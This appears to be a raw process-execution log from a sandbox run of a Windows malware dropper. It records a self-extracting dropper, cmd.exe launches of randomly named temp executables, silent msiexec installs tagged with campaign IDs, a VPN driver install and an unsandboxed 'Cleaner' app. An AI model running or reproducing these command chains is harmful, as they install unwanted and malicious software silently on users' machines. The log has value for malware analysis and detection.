C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164" "a219"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9F33BB0CB4746FB4A7EE7E69F875189F C
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\Documents\kz7bTmxYNsyXSGVl8HVLBc7z.exe
"C:\Users\Admin\Documents\kz7bTmxYNsyXSGVl8HVLBc7z.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 4000 -ip 4000
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4000 -s 2388
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5160 -ip 5160
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 2468
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5712 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lvbtwuyu.ewm\GcleanerEU.exe /eufive & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tnfzfqzt.xyz\installer.exe /qn CAMPAIGN="654" & exit
C:\Users\Admin\AppData\Local\Temp\tnfzfqzt.xyz\installer.exe
C:\Users\Admin\AppData\Local\Temp\tnfzfqzt.xyz\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\lvbtwuyu.ewm\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\lvbtwuyu.ewm\GcleanerEU.exe /eufive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yzec1bpe.zhd\ufgaa.exe & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3836 -ip 3836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 276
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7F8ED4812D1FC6B26DBB02A39C063041 C
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nxgt0mdr.ssl\anyname.exe & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uousy3rf.wn3\gcleaner.exe /mixfive & exit
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\nxgt0mdr.ssl\anyname.exe
C:\Users\Admin\AppData\Local\Temp\nxgt0mdr.ssl\anyname.exe
C:\Users\Admin\AppData\Local\Temp\uousy3rf.wn3\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\uousy3rf.wn3\gcleaner.exe /mixfive
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tnfzfqzt.xyz\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tnfzfqzt.xyz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\nxgt0mdr.ssl\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\nxgt0mdr.ssl\anyname.exe" -q
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7636 -ip 7636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 5436 -ip 5436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 1580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 280
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcwiu1l1.eau\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5360 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_776F.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0xc8,0x210,0x7ffa05b7dec0,0x7ffa05b7ded0,0x7ffa05b7dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ff62c569e70,0x7ff62c569e80,0x7ff62c569e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=1844 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1612 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=2400 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2536 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2544 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
